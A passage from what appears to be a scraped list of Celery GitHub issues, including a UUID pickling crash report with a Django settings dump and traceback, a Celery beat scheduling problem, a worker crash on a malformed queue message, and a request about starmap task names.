    loader   -> celery.loaders.app.AppLoader
    settings -> transport:pyamqp results:redis://redis/
    
    ABSOLUTE_URL_OVERRIDES: {
     }
    ADMINS: []
    ALLOWED_HOSTS: ['localhost',
     '127.0.0.1',
     '::1',
     'host.docker.internal',
     '10.0.2.2',
     '172.17.0.1']
    APPEND_SLASH: True
    AUTHENTICATION_BACKENDS: ['django.contrib.auth.backends.ModelBackend']
    AUTH_PASSWORD_VALIDATORS: '********'
    AUTH_USER_MODEL: 'auth.User'
    BASE_DIR: '/usr/src/app'
    CACHES: {
     'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}}
    CACHE_MIDDLEWARE_ALIAS: 'default'
    CACHE_MIDDLEWARE_KEY_PREFIX: '********'
    CACHE_MIDDLEWARE_SECONDS: 600
    CELERY_ACCEPT_CONTENT: ['customjson']
    CELERY_BROKER_URL: 'amqp://guest:********@rabbitmq:5672//'
    CELERY_ENABLE_UTC: True
    CELERY_RESULT_BACKEND: 'redis://redis/'
    CELERY_RESULT_SERIALIZER: 'customjson'
    CELERY_TASK_SERIALIZER: 'customjson'
    CELERY_TIMEZONE: 'Europe/Amsterdam'
    <private>
    CRON_CLASSES: ['geocatalog.cron.UpdateCswTables']
    CSRF_COOKIE_AGE: 31449600
    CSRF_COOKIE_DOMAIN: None
    CSRF_COOKIE_HTTPONLY: False
    CSRF_COOKIE_NAME: 'csrftoken'
    CSRF_COOKIE_PATH: '/'
    CSRF_COOKIE_SAMESITE: 'Lax'
    CSRF_COOKIE_SECURE: False
    CSRF_FAILURE_VIEW: 'django.views.csrf.csrf_failure'
    CSRF_HEADER_NAME: 'HTTP_X_CSRFTOKEN'
    CSRF_TRUSTED_ORIGINS: []
    CSRF_USE_SESSIONS: False
    DATABASES: {
        'default': {   'ATOMIC_REQUESTS': False,
                       'AUTOCOMMIT': True,
                       'CONN_MAX_AGE': 0,
                       'ENGINE': 'django.db.backends.postgresql',
                       'HOST': 'host.docker.internal',
                       'NAME': 'osmgmt',
                       'OPTIONS': {},
                       'PASSWORD': '********',
                       'PORT': '5432',
                       'TEST': {   'CHARSET': None,
                                   'COLLATION': None,
                                   'MIGRATE': True,
                                   'MIRROR': None,
                                   'NAME': None},
                       'TIME_ZONE': None,
                       'USER': 'django'}}
    DATABASE_ROUTERS: '********'
    <private>
    DATA_UPLOAD_MAX_MEMORY_SIZE: 2621440
    DATA_UPLOAD_MAX_NUMBER_FIELDS: 1000
    DATETIME_FORMAT: 'N j, Y, P'
    DATETIME_INPUT_FORMATS: ['%Y-%m-%d %H:%M:%S',
     '%Y-%m-%d %H:%M:%S.%f',
     '%Y-%m-%d %H:%M',
     '%m/%d/%Y %H:%M:%S',
     '%m/%d/%Y %H:%M:%S.%f',
     '%m/%d/%Y %H:%M',
     '%m/%d/%y %H:%M:%S',
     '%m/%d/%y %H:%M:%S.%f',
     '%m/%d/%y %H:%M']
    DATE_FORMAT: 'N j, Y'
    DATE_INPUT_FORMATS: ['%Y-%m-%d',
     '%m/%d/%Y',
     '%m/%d/%y',
     '%b %d %Y',
     '%b %d, %Y',
     '%d %b %Y',
     '%d %b, %Y',
     '%B %d %Y',
     '%B %d, %Y',
     '%d %B %Y',
     '%d %B, %Y']
    DEBUG: 1
    DEBUG_PROPAGATE_EXCEPTIONS: False
    DECIMAL_SEPARATOR: '.'
    DEFAULT_AUTO_FIELD: 'django.db.models.AutoField'
    DEFAULT_CHARSET: 'utf-8'
    DEFAULT_EXCEPTION_REPORTER: 'django.views.debug.ExceptionReporter'
    DEFAULT_EXCEPTION_REPORTER_FILTER: 'django.views.debug.SafeExceptionReporterFilter'
    DEFAULT_FILE_STORAGE: 'django.core.files.storage.FileSystemStorage'
    <private>
    DEFAULT_HASHING_ALGORITHM: 'sha256'
    DEFAULT_INDEX_TABLESPACE: ''
    DEFAULT_TABLESPACE: ''
    DISALLOWED_USER_AGENTS: []
    EMAIL_BACKEND: 'django.core.mail.backends.smtp.EmailBackend'
    EMAIL_HOST: 'mailhost.domain.com'
    EMAIL_HOST_PASSWORD: '********'
    EMAIL_HOST_USER: '[email protected]'
    EMAIL_PORT: '465'
    EMAIL_SSL_CERTFILE: None
    EMAIL_SSL_KEYFILE: '********'
    EMAIL_SUBJECT_PREFIX: '[Django] '
    EMAIL_TIMEOUT: None
    EMAIL_USE_LOCALTIME: False
    EMAIL_USE_SSL: 'True'
    EMAIL_USE_TLS: False
    <private>
    FILE_UPLOAD_DIRECTORY_PERMISSIONS: None
    FILE_UPLOAD_HANDLERS: ['django.core.files.uploadhandler.MemoryFileUploadHandler',
     'django.core.files.uploadhandler.TemporaryFileUploadHandler']
    FILE_UPLOAD_MAX_MEMORY_SIZE: 2621440
    FILE_UPLOAD_PERMISSIONS: 420
    FILE_UPLOAD_TEMP_DIR: None
    FIRST_DAY_OF_WEEK: 0
    FIXTURE_DIRS: []
    FORCE_SCRIPT_NAME: None
    FORMAT_MODULE_PATH: None
    FORM_RENDERER: 'django.forms.renderers.DjangoTemplates'
    <private>
    IGNORABLE_404_URLS: []
    INSTALLED_APPS: ['config.apps.ConfigConfig',
     'dataupload.apps.DatauploadConfig',
     'gds.apps.GdsConfig',
     'mapcomposer.apps.MapcomposerConfig',
     'workflow.apps.WorkflowConfig',
     'django.contrib.admin',
     'django.contrib.auth',
     'django.contrib.contenttypes',
     'django.contrib.sessions',
     'django.contrib.messages',
     'django.contrib.staticfiles',
     'django_cron',
     'polymorphic',
     'rest_framework',
     'taggit']
    INTERNAL_IPS: []
    <private>
    LANGUAGES: [('af', 'Afrikaans'),
     ('ar', 'Arabic'),
     ('ar-dz', 'Algerian Arabic'),
     ('ast', 'Asturian'),
     ('az', 'Azerbaijani'),
     ('bg', 'Bulgarian'),
     ('be', 'Belarusian'),
     ('bn', 'Bengali'),
     ('br', 'Breton'),
     ('bs', 'Bosnian'),
     ('ca', 'Catalan'),
     ('cs', 'Czech'),
     ('cy', 'Welsh'),
     ('da', 'Danish'),
     ('de', 'German'),
     ('dsb', 'Lower Sorbian'),
     ('el', 'Greek'),
     ('en', 'English'),
     ('en-au', 'Australian English'),
     ('en-gb', 'British English'),
     ('eo', 'Esperanto'),
     ('es', 'Spanish'),
     ('es-ar', 'Argentinian Spanish'),
     ('es-co', 'Colombian Spanish'),
     ('es-mx', 'Mexican Spanish'),
     ('es-ni', 'Nicaraguan Spanish'),
     ('es-ve', 'Venezuelan Spanish'),
     ('et', 'Estonian'),
     ('eu', 'Basque'),
     ('fa', 'Persian'),
     ('fi', 'Finnish'),
     ('fr', 'French'),
     ('fy', 'Frisian'),
     ('ga', 'Irish'),
     ('gd', 'Scottish Gaelic'),
     ('gl', 'Galician'),
     ('he', 'Hebrew'),
     ('hi', 'Hindi'),
     ('hr', 'Croatian'),
     ('hsb', 'Upper Sorbian'),
     ('hu', 'Hungarian'),
     ('hy', 'Armenian'),
     ('ia', 'Interlingua'),
     ('id', 'Indonesian'),
     ('ig', 'Igbo'),
     ('io', 'Ido'),
     ('is', 'Icelandic'),
     ('it', 'Italian'),
     ('ja', 'Japanese'),
     ('ka', 'Georgian'),
     ('kab', 'Kabyle'),
     ('kk', 'Kazakh'),
     ('km', 'Khmer'),
     ('kn', 'Kannada'),
     ('ko', 'Korean'),
     ('ky', 'Kyrgyz'),
     ('lb', 'Luxembourgish'),
     ('lt', 'Lithuanian'),
     ('lv', 'Latvian'),
     ('mk', 'Macedonian'),
     ('ml', 'Malayalam'),
     ('mn', 'Mongolian'),
     ('mr', 'Marathi'),
     ('my', 'Burmese'),
     ('nb', 'Norwegian Bokmål'),
     ('ne', 'Nepali'),
     ('nl', 'Dutch'),
     ('nn', 'Norwegian Nynorsk'),
     ('os', 'Ossetic'),
     ('pa', 'Punjabi'),
     ('pl', 'Polish'),
     ('pt', 'Portuguese'),
     ('pt-br', 'Brazilian Portuguese'),
     ('ro', 'Romanian'),
     ('ru', 'Russian'),
     ('sk', 'Slovak'),
     ('sl', 'Slovenian'),
     ('sq', 'Albanian'),
     ('sr', 'Serbian'),
     ('sr-latn', 'Serbian Latin'),
     ('sv', 'Swedish'),
     ('sw', 'Swahili'),
     ('ta', 'Tamil'),
     ('te', 'Telugu'),
     ('tg', 'Tajik'),
     ('th', 'Thai'),
     ('tk', 'Turkmen'),
     ('tr', 'Turkish'),
     ('tt', 'Tatar'),
     ('udm', 'Udmurt'),
     ('uk', 'Ukrainian'),
     ('ur', 'Urdu'),
     ('uz', 'Uzbek'),
     ('vi', 'Vietnamese'),
     ('zh-hans', 'Simplified Chinese'),
     ('zh-hant', 'Traditional Chinese')]
    LANGUAGES_BIDI: ['he', 'ar', 'ar-dz', 'fa', 'ur']
    LANGUAGE_CODE: 'nl-nl'
    LANGUAGE_COOKIE_AGE: None
    LANGUAGE_COOKIE_DOMAIN: None
    LANGUAGE_COOKIE_HTTPONLY: False
    LANGUAGE_COOKIE_NAME: 'django_language'
    LANGUAGE_COOKIE_PATH: '/'
    LANGUAGE_COOKIE_SAMESITE: None
    LANGUAGE_COOKIE_SECURE: False
    LOCALE_PATHS: []
    LOGGING: {
        'disable_existing_loggers': False,
        'formatters': {   'verbose': {   'format': '{asctime} - {module} - '
                                                   '{levelname} - {message}',
                                         'style': '{'}},
        'handlers': {   'console': {   'class': 'logging.StreamHandler',
                                       'formatter': 'verbose'}},
        'loggers': {   'etl': {   'handlers': ['console'],
                                  'level': 'INFO',
                                  'propagate': False}},
        'version': 1}
    LOGGING_CONFIG: 'logging.config.dictConfig'
    LOGIN_REDIRECT_URL: '/'
    LOGIN_URL: '/accounts/login/'
    LOGOUT_REDIRECT_URL: None
    MANAGERS: []
    MEDIA_ROOT: '/media'
    MEDIA_URL: '/'
    MESSAGE_STORAGE: 'django.contrib.messages.storage.fallback.FallbackStorage'
    MIDDLEWARE: ['django.middleware.security.SecurityMiddleware',
     'django.contrib.sessions.middleware.SessionMiddleware',
     'django.middleware.common.CommonMiddleware',
     'django.middleware.csrf.CsrfViewMiddleware',
     'django.contrib.auth.middleware.AuthenticationMiddleware',
     'django.contrib.messages.middleware.MessageMiddleware',
     'django.middleware.clickjacking.XFrameOptionsMiddleware']
    MIGRATION_MODULES: {
     }
    MONTH_DAY_FORMAT: 'F j'
    NUMBER_GROUPING: 0
    <private>
    PASSWORD_HASHERS: '********'
    PASSWORD_RESET_TIMEOUT: '********'
    PASSWORD_RESET_TIMEOUT_DAYS: '********'
    PREPEND_WWW: False
    REST_FRAMEWORK: {
        'DEFAULT_AUTHENTICATION_CLASSES': [   'rest_framework.authentication.SessionAuthentication',
                                              'rest_framework.authentication.BasicAuthentication',
                                              'rest_framework_simplejwt.authentication.JWTAuthentication'],
        'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
        'DEFAULT_PERMISSION_CLASSES': [   'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'],
        'PAGE_SIZE': 10}
    ROOT_URLCONF: 'osmgmt.urls'
    SECRET_KEY: '********'
    SECURE_BROWSER_XSS_FILTER: False
    SECURE_CONTENT_TYPE_NOSNIFF: True
    SECURE_HSTS_INCLUDE_SUBDOMAINS: False
    SECURE_HSTS_PRELOAD: False
    SECURE_HSTS_SECONDS: 0
    SECURE_PROXY_SSL_HEADER:
        ('HTTP_X_FORWARDED_PROTO', 'https')
    SECURE_REDIRECT_EXEMPT: []
    SECURE_REFERRER_POLICY: 'same-origin'
    SECURE_SSL_HOST: None
    SECURE_SSL_REDIRECT: False
    SERVER_EMAIL: '[email protected]'
    SESSION_CACHE_ALIAS: 'default'
    SESSION_COOKIE_AGE: 1800
    SESSION_COOKIE_DOMAIN: None
    SESSION_COOKIE_HTTPONLY: True
    SESSION_COOKIE_NAME: 'sessionid'
    SESSION_COOKIE_PATH: '/'
    SESSION_COOKIE_SAMESITE: 'Lax'
    SESSION_COOKIE_SECURE: False
    SESSION_ENGINE: 'django.contrib.sessions.backends.db'
    SESSION_EXPIRE_AT_BROWSER_CLOSE: False
    SESSION_FILE_PATH: None
    SESSION_SAVE_EVERY_REQUEST: True
    SESSION_SERIALIZER: 'django.contrib.sessions.serializers.JSONSerializer'
    SETTINGS_MODULE: 'osmgmt.settings'
    SHORT_DATETIME_FORMAT: 'm/d/Y P'
    SHORT_DATE_FORMAT: 'm/d/Y'
    SIGNING_BACKEND: 'django.core.signing.TimestampSigner'
    SILENCED_SYSTEM_CHECKS: []
    SIMPLE_JWT: {
        'ACCESS_TOKEN_LIFETIME': '********',
        'TOKEN_TYPE_CLAIM': '********',
        'USER_ID_CLAIM': 'user',
        'USER_ID_FIELD': 'username'}
    STATICFILES_DIRS: ['/usr/src/app/static',
     '/usr/src/app/dataupload/static']
    STATICFILES_FINDERS: ['django.contrib.staticfiles.finders.FileSystemFinder',
     'django.contrib.staticfiles.finders.AppDirectoriesFinder']
    STATICFILES_STORAGE: 'django.contrib.staticfiles.storage.StaticFilesStorage'
    STATIC_ROOT: '/usr/src/app/allstaticfiles'
    STATIC_URL: '/static/'
    TEMPLATES: [{'APP_DIRS': True,
      'BACKEND': 'django.template.backends.jinja2.Jinja2',
      'DIRS': [],
      'OPTIONS': {'environment': 'osmgmt.jinja2.environment'}},
     {'APP_DIRS': True,
      'BACKEND': 'django.template.backends.django.DjangoTemplates',
      'DIRS': ['/usr/src/app/templates'],
      'OPTIONS': {'context_processors': ['django.template.context_processors.debug',
                                         'django.template.context_processors.request',
                                         'django.contrib.auth.context_processors.auth',
                                         'django.contrib.messages.context_processors.messages']}}]
    TEST_NON_SERIALIZED_APPS: []
    TEST_RUNNER: 'django.test.runner.DiscoverRunner'
    THOUSAND_SEPARATOR: ','
    TIME_FORMAT: 'P'
    TIME_INPUT_FORMATS: ['%H:%M:%S', '%H:%M:%S.%f', '%H:%M']
    TIME_ZONE: 'Europe/Amsterdam'
    USE_I18N: True
    USE_L10N: True
    USE_THOUSAND_SEPARATOR: True
    USE_TZ: False
    USE_X_FORWARDED_HOST: True
    USE_X_FORWARDED_PORT: False
    WSGI_APPLICATION: 'osmgmt.wsgi.application'
    X_FRAME_OPTIONS: 'DENY'
    YEAR_MONTH_FORMAT: 'F Y'
    is_overridden: <bound method Settings.is_overridden of <Settings "osmgmt.settings">>
    deprecated_settings: None
    

    Steps to Reproduce

    Required Dependencies

    • Minimal Python Version: N/A or Unknown
    • Minimal Celery Version: N/A or Unknown
    • Minimal Kombu Version: N/A or Unknown
    • Minimal Broker Version: N/A or Unknown
    • Minimal Result Backend Version: N/A or Unknown
    • Minimal OS and/or Kernel Version: N/A or Unknown
    • Minimal Broker Client Version: N/A or Unknown
    • Minimal Result Backend Client Version: N/A or Unknown

    Python Packages

    pip freeze Output:

    amqp==5.1.1
    anyjson==0.3.3
    asgiref==3.6.0
    async-timeout==4.0.2
    attrs==22.2.0
    bcrypt==4.0.1
    billiard==3.6.4.0
    celery==5.2.7
    certifi==2022.12.7
    cffi==1.15.1
    charset-normalizer==2.0.12
    click==8.1.3
    click-didyoumean==0.0.3
    click-plugins==1.1.1
    click-repl==0.2.0
    cligj==0.7.2
    colorama==0.4.4
    contourpy==1.0.6
    cryptography==39.0.0
    cycler==0.11.0
    defusedxml==0.7.1
    Django==3.2.12
    django-cron==0.6.0
    django-polymorphic==3.1.0
    django-taggit==3.1.0
    djangorestframework==3.14.0
    djangorestframework-simplejwt==5.2.2
    ephem==3.7.7.1
    Fiona==1.8.22
    flower==1.2.0
    fonttools==4.38.0
    fpdf2==2.6.0
    geolinks==0.2.0
    geopandas==0.12.2
    greenlet==2.0.1
    humanize==4.4.0
    idna==3.4
    Jinja2==3.1.2
    jsonschema==4.17.3
    kiwisolver==1.4.4
    kombu==5.2.4
    lxml==4.9.2
    MarkupSafe==2.1.1
    matplotlib==3.6.2
    munch==2.5.0
    numpy==1.24.1
    OWSLib==0.27.2
    packaging==22.0
    pandas==1.5.2
    paramiko==2.12.0
    parsimonious==0.10.0
    Pillow==9.4.0
    prometheus-client==0.15.0
    prompt-toolkit==3.0.14
    psycopg2-binary==2.9.5
    pycparser==2.21
    pycsw==2.6.1
    Pygments==2.14.0
    PyJWT==2.6.0
    PyNaCl==1.5.0
    pyparsing==2.4.7
    PyPDF2==2.11.2
    pyproj==3.4.1
    pyrsistent==0.19.3
    python-dateutil==2.8.1
    python-memcached==1.58
    pytz==2022.7
    PyYAML==6.0
    redis==4.4.0
    regex==2022.10.31
    requests==2.28.1
    scp==0.14.4
    Shapely==1.8.5.post1
    six==1.16.0
    SQLAlchemy==1.4.45
    sqlparse==0.4.3
    tornado==6.2
    typing_extensions==4.4.0
    Unidecode==1.3.6
    urllib3==1.26.13
    vine==5.0.0
    wcwidth==0.1.9
    xmltodict==0.13.0
    

    Other Dependencies

    OS: Linux Debian Buster - Bullseye (in Docker on Windows) Python 3.7 - 3.9 Django: 3.2.12 Celery 5.0.5 - 5.2.7 Kombu 5.0.2 - 5.2.4 librabbitmq 2.0.0 or amqp 5.1.1

    Minimally Reproducible Test Case

    Expected Behavior

    The task submitted to the broker is being processed happily by Celery.

    Actual Behavior

    The following error occurs:

    celery_1         | [2023-01-03 16:58:29,653: CRITICAL/MainProcess] Unrecoverable error: AttributeError('int')
    celery_1         | Traceback (most recent call last):
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/worker.py", line 203, in start
    celery_1         |     self.blueprint.start(self)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/bootsteps.py", line 116, in start
    celery_1         |     step.start(parent)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/bootsteps.py", line 365, in start
    celery_1         |     return self.obj.start()
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/consumer/consumer.py", line 332, in start
    celery_1         |     blueprint.start(self)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/bootsteps.py", line 116, in start
    celery_1         |     step.start(parent)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/consumer/consumer.py", line 628, in start
    celery_1         |     c.loop(*c.loop_args())
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/loops.py", line 97, in asynloop
    celery_1         |     next(loop)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/asynchronous/hub.py", line 362, in create_loop
    celery_1         |     cb(*cbargs)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/transport/base.py", line 235, in on_readable
    celery_1         |     reader(loop)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/transport/base.py", line 217, in _read
    celery_1         |     drain_events(timeout=0)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/connection.py", line 525, in drain_events
    celery_1         |     while not self.blocking_read(timeout):
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/connection.py", line 531, in blocking_read
    celery_1         |     return self.on_inbound_frame(frame)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/method_framing.py", line 77, in on_frame
    celery_1         |     callback(channel, msg.frame_method, msg.frame_args, msg)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/connection.py", line 537, in on_inbound_method
    celery_1         |     return self.channels[channel_id].dispatch_method(
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/abstract_channel.py", line 156, in dispatch_method
    celery_1         |     listener(*args)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/channel.py", line 1629, in _on_basic_deliver
    celery_1         |     fun(msg)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/messaging.py", line 626, in _receive_callback
    celery_1         |     return on_m(message) if on_m else self.receive(decoded, message)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/consumer/consumer.py", line 596, in on_task_received
    celery_1         |     strategy(
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/strategy.py", line 207, in task_message_handler
    celery_1         |     handle(req)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/worker.py", line 221, in _process_task_sem
    celery_1         |     return self._quick_acquire(self._process_task, req)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/asynchronous/semaphore.py", line 54, in acquire
    celery_1         |     callback(*partial_args, **partial_kwargs)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/worker.py", line 226, in _process_task
    celery_1         |     req.execute_using_pool(self.pool)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/request.py", line 707, in execute_using_pool
    celery_1         |     result = apply_async(
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/concurrency/base.py", line 152, in apply_async
    celery_1         |     return self.on_apply(target, args, kwargs,
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/billiard/pool.py", line 1530, in apply_async
    celery_1         |     self._quick_put((TASK, (result._job, None, func, args, kwds)))
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/concurrency/asynpool.py", line 866, in send_job
    celery_1         |     body = dumps(tup, protocol=protocol)
    celery_1         |   File "/usr/lib/python3.9/uuid.py", line 225, in __getstate__
    celery_1         |     d = {'int': self.int}
    celery_1         | AttributeError: int
    

    This happens after a task has been placed in RabbitMQ (broker) by Django, and is about to be handled by my worker (celery_1 container). The task is using the Celery canvas.

    In Python 3.7 the actual error is a bit different, but it also occurs in the __getstate__ method in uuid.py. At that time I was able to patch this error by using my own version of uuid.py. I've added the check self.is_safe is not None. Relevant part:

        def __getstate__(self):
            state = self.__dict__.copy()
            if self.is_safe != SafeUUID.unknown:
                # is_safe is a SafeUUID instance.  Return just its value, so that
                # it can be un-pickled in older Python versions without SafeUUID.
                state['is_safe'] = self.is_safe.value
            else:
                # omit is_safe when it is "unknown"
                del state['is_safe']
            return state
    

    After this everything seemed to proceed as normal.

    Python 3.9 code for reference where this error occurs (see stack trace):

        def __getstate__(self):
            d = {'int': self.int}
            if self.is_safe != SafeUUID.unknown:
                # is_safe is a SafeUUID instance.  Return just its value, so that
                # it can be un-pickled in older Python versions without SafeUUID.
                d['is_safe'] = self.is_safe.value
            return d
    

    The file uuid.py in my container is identical to the one here: https://github.com/python/cpython/blob/3.9/Lib/uuid.py

    However, now it is time to use Python 3.9 (provided by Debian Bullseye), and I'm not able to work around this issue by fiddling with uuid.py. When I added a fix to the missing 'int' attribute (for example by setting it to 0), a similar error occurs somewhere else. I haven't tried patching uuid.py all over the place. Since this issue is occurring with multiple Celery versions and two different Python versions, I finally took the time to submit the bug report.

    I have no clue what this causes, since the stack trace is very deep, but I assume this is related to serialization / deserialization of the message ID (which is a UUID). It seems to me that the __init__ method is never called when the UUID object is created. I could verify this by adding print statements to uuid.py in both the __init__ method and the __getstate__ method. The print statement in the __getstate__ method reported a different ID (print(id(self))) than any of the ID's printed in __init__.

    I've tried to mitigate this issue by using Celery versions 5.0.5 - 5.2.7 (originally I was using 5.2.3). I've also switched from librabbitmq to the amqp Python lib. I've also tried to use Kombu 5.0.2 (together with Celery 5.0.5).

    It is possible that this is actually caused by an issue in Kombu or Billiard.

    Issue Type: Bug Report 
    opened by fsteggink 4
  • Celery beat stuck on start

    Celery beat stuck on start

    Celery beat doesn't serve periodic tasks, yet delayed tasks served nominally.

    I'm starting the celery by celery -A app.celery worker -B -l info

    Traceback is following:

     -------------- [email protected] v5.2.7 (dawn-chorus)
    --- ***** ----- 
    -- ******* ---- Darwin-22.1.0-arm64-arm-64bit 2022-12-24 17:53:01
    - *** --- * --- 
    - ** ---------- [config]
    - ** ---------- .> app:         app:0x104c92f88
    - ** ---------- .> transport:   redis://localhost:6379//
    - ** ---------- .> results:     disabled://
    - *** --- * --- .> concurrency: 8 (prefork)
    -- ******* ---- .> task events: OFF (enable -E to monitor tasks in this worker)
    --- ***** ----- 
     -------------- [queues]
                    .> celery           exchange=celery(direct) key=celery
                    
    
    [tasks]
      . tasks.periodic_send_messages
      . tasks.send_messages
    
    [2022-12-24 17:53:01,770: INFO/MainProcess] Connected to redis://localhost:6379//
    [2022-12-24 17:53:01,771: INFO/MainProcess] mingle: searching for neighbors
    [2022-12-24 17:53:02,422: INFO/Beat] beat: Starting...
    [2022-12-24 17:53:02,780: INFO/MainProcess] mingle: all alone
    [2022-12-24 17:53:02,802: INFO/MainProcess] celery@ mxmaslin-Mac-mini.local ready.
    [2022-12-25 07:00:00,019: INFO/Beat] Scheduler: Sending due task celery.backend_cleanup (celery.backend_cleanup)
    [2022-12-25 07:00:00,031: INFO/MainProcess] Task celery.backend_cleanup[94338a6f-22d1-43e8-b640-132b779f116b] received
    [2022-12-25 07:00:00,035: INFO/ForkPoolWorker-8] Task celery.backend_cleanup[94338a6f-22d1-43e8-b640-132b779f116b] succeeded in 0.0008972089999588206s: None
    

    Code is following:

    from datetime import timedelta
    from celery import Celery
    from celery.utils.log import get_task_logger
    
    celery = Celery(
        __name__,
        broker='redis://localhost:6379',
        include=['tasks']
    )
    celery.conf.timezone = 'UTC'
    
    logger = get_task_logger(__name__)
    
    @celery.task
    def periodic_task():
        logger.debug('yay')
    
    CELERYBEAT_SCHEDULE = {
        'every-second': {
            'task': 'periodic_task',
            'schedule': timedelta(seconds=1),
        }
    }
    

    The celery version is 5.2.7, OS is Mac OS Ventura 13.0.1.

    Issue Type: Bug Report 
    opened by mxmaslin 4
  • Celery Getting Killed if message in queue is not in Correct format.

    Celery Getting Killed if message in queue is not in Correct format.

    Checklist

    • [x] I have verified that the issue exists against the main branch of Celery.
    • [ ] This has already been asked to the discussions forum first.
    • [ ] I have read the relevant section in the contribution guide on reporting bugs.
    • [ ] I have checked the issues list for similar or identical bug reports.
    • [ ] I have checked the pull requests list for existing proposed fixes.
    • [ ] I have checked the commit log to find out if the bug was already fixed in the main branch.
    • [ ] I have included all related issues and possible duplicate issues in this issue (If there are none, check this box anyway).

    Mandatory Debugging Information

    • [ ] I have included the output of celery -A proj report in the issue. (if you are not able to do this, then at least specify the Celery version affected).
    • [ ] I have verified that the issue exists against the main branch of Celery.
    • [ ] I have included the contents of pip freeze in the issue.
    • [ ] I have included all the versions of all the external dependencies required to reproduce this bug.

    Optional Debugging Information

    • [ ] I have tried reproducing the issue on more than one Python version and/or implementation.
    • [ ] I have tried reproducing the issue on more than one message broker and/or result backend.
    • [ ] I have tried reproducing the issue on more than one version of the message broker and/or result backend.
    • [ ] I have tried reproducing the issue on more than one operating system.
    • [ ] I have tried reproducing the issue on more than one workers pool.
    • [ ] I have tried reproducing the issue with autoscaling, retries, ETA/Countdown & rate limits disabled.
    • [ ] I have tried reproducing the issue after downgrading and/or upgrading Celery and its dependencies.

    Related Issues and Possible Duplicates

    Related Issues

    • None

    Possible Duplicates

    • None

    Environment & Settings

    Celery version:

    celery report Output:

    Steps to Reproduce

    Required Dependencies

    • Minimal Python Version: N/A or Unknown
    • Minimal Celery Version: N/A or Unknown
    • Minimal Kombu Version: N/A or Unknown
    • Minimal Broker Version: N/A or Unknown
    • Minimal Result Backend Version: N/A or Unknown
    • Minimal OS and/or Kernel Version: N/A or Unknown
    • Minimal Broker Client Version: N/A or Unknown
    • Minimal Result Backend Client Version: N/A or Unknown

    Python Packages

    pip freeze Output:

    Other Dependencies

    N/A

    Minimally Reproducible Test Case

    Celery Worker should not get killed

    Celery Worker is getting killed if message is wrong

    Some thrid party apps is putting data in the same redis queue through which celery is working. If message is mis formatted or some attributes are missing celery worker is getting klilled.

    For example:

    { "body": "gASVPwAAAAAAAACMBmFzZGFzZJSFlH2UfZQojAljYWxsYmFja3OUTowIZXJyYmFja3OUTowFY2hhaW6UTowFY2hvcmSUTnWHlC4=", "content-encoding": "binary", "contentType": "application/x-python-serialize", "headers": { "lang": "py", "task": "caldera_server.tasks.hello_task", "id": "d0b6b9da-9503-4f3b-ae9e-bbb69f7412d5", "shadow": null, "eta": null, "expires": null, "group": null, "group_index": null, "retries": 0, "timelimit": [ null, null ], "root_id": "d0b6b9da-9503-4f3b-ae9e-bbb69f7412d5", "parent_id": null, "argsrepr": "('asdasd',)", "kwargsrepr": "{}", "origin": "[email protected]", "ignore_result": false }, "properties": { "correlation_id": "d0b6b9da-9503-4f3b-ae9e-bbb69f7412d5", "reply_to": "94bdfc39-1575-3f5e-bfed-2b112e16368f", "delivery_mode": 2, "delivery_info": { "exchange": "", "routing_key": "celery" }, "priority": 0, "body_encoding": "base64", "delivery_tag": "782773ea-ca49-4b9d-8f68-1998a03883b9" } }

    Here instead of content-type its contentType. Which is causing celery worker getting killed. image

    Issue Type: Bug Report 
    opened by pranavdxl 2
  • map and starmap should log a name based on the original task name

    map and starmap should log a name based on the original task name

    Checklist

    • [x] I have checked the issues list for similar or identical enhancement to an existing feature.
    • [x] I have checked the pull requests list for existing proposed enhancements.
    • [ ] I have checked the commit log to find out if the if the same enhancement was already implemented in the master branch.
    • [ ] I have included all related issues and possible duplicate issues in this issue (If there are none, check this box anyway).

    Related Issues and Possible Duplicates

    Related Issues

    • None

    Possible Duplicates

    • None

    Brief Summary

    If I use task.chunks(...).group() etc. to run tasks, all I see in the logs will be "celery.starmap" and the information about the original task name is completely lost.

    I'd like to see e.g. a task name derived on the original one, such as: original_task_name.starmap.

    Design

    It might be possible to turn the _task_name class attribute into a class property maybe?

    Architectural Considerations

    I don't know if this might break other parts of celery.

    None

    Proposed Behavior

    I'd like to see e.g. a task name derived on the original one, such as: original_task_name.starmap.

    Proposed UI/UX

    No change.

    Diagrams

    N/A

    Alternatives

    1. Currently one alternative seems to be to override methods and classes in multiple places, see https://gitter.im/celery/celery?at=639b204db9b687534196b04f which is cumbersome, so a direct change in celery core seems cleaner.

    2. Maybe a method on the Task and/or Signature classes that can be overridden? That one could trivially return celery.starmap for now in order to remain compatible with existing installations.

    Issue Type: Enhancement 
    opened by TauPan 1
  • Switch between thread & global for app.backend

